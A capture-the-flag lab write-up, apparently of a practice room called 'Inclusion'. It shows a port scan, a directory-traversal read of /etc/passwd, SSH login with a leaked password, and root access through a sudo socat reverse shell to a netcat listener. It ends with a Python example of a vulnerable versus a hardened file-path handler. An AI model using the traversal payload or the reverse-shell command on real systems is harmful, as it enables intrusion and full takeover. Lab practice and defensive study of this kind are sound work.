$ nmap 10.10.161.132
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 10:48 AEST
Nmap scan report for 10.10.161.132
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Page format: 10.10.161.132/article?name=hacking
Try LFI: 10.10.161.132/article?name=../../../../etc/passwd → success!
Atypical line: #falconfeast:rootpassword
@kali:~$ ssh [email protected]
[email protected]'s password: rootpassword
falconfeast@inclusion:~$
falconfeast@inclusion:~$ cat user.txt -> success!
# SSH
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
# https://gtfobins.github.io/gtfobins/socat/
# Kali
@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...
# SSH
falconfeast@inclusion:~$ RHOST=<my-THM-IP>
falconfeast@inclusion:~$ RPORT=4444
falconfeast@inclusion:~$ sudo socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
# Kali
connect to [<my-THM-IP>] from (UNKNOWN) [10.10.161.132] 38924
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cat /root/root.txt -> success!
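
The `article?name=` request above returned `/etc/passwd` because the requested name reached the filesystem unchecked. The following is an added example, not code from the target application: it shows the flawed join beside a version that resolves the path and rejects anything outside the article directory. It assumes a Python handler that joins `name` to an article directory; the function names and directory layout are hypothetical.

```python
import tempfile
from pathlib import Path


def read_article_vulnerable(base: Path, name: str) -> str:
    """Assumed shape of the flawed handler: 'name' is joined to the base unchecked."""
    return (base / name).read_text()


def read_article_hardened(base: Path, name: str) -> str:
    """Resolve the final path first, then require it to stay under the base."""
    root = base.resolve()
    target = (root / name).resolve()  # collapses "..", symlinks, absolute names
    if root not in target.parents or not target.is_file():
        raise ValueError("article not found")
    return target.read_text()


def demo() -> dict:
    """Run both handlers against a constructed directory tree."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "articles"
        base.mkdir()
        (base / "hacking").write_text("article body")
        secret = Path(tmp) / "secret.txt"  # constructed stand-in for /etc/passwd
        secret.write_text("outside the article directory")

        cases = [
            ("normal", "hacking"),
            ("dotdot", "../secret.txt"),   # relative traversal
            ("absolute", str(secret)),     # absolute name replaces the base in a join
        ]
        results = {}
        for label, name in cases:
            leaked = read_article_vulnerable(base, name)
            try:
                safe = read_article_hardened(base, name)
            except ValueError:
                safe = None  # request rejected
            results[label] = (leaked, safe)
        return results


if __name__ == "__main__":
    for label, (leaked, safe) in demo().items():
        print(f"{label:9} vulnerable={leaked!r} hardened={safe!r}")
```

The absolute-path case is the one a plain `".." in name` filter misses, which is why the check is made on the resolved path rather than on the input string.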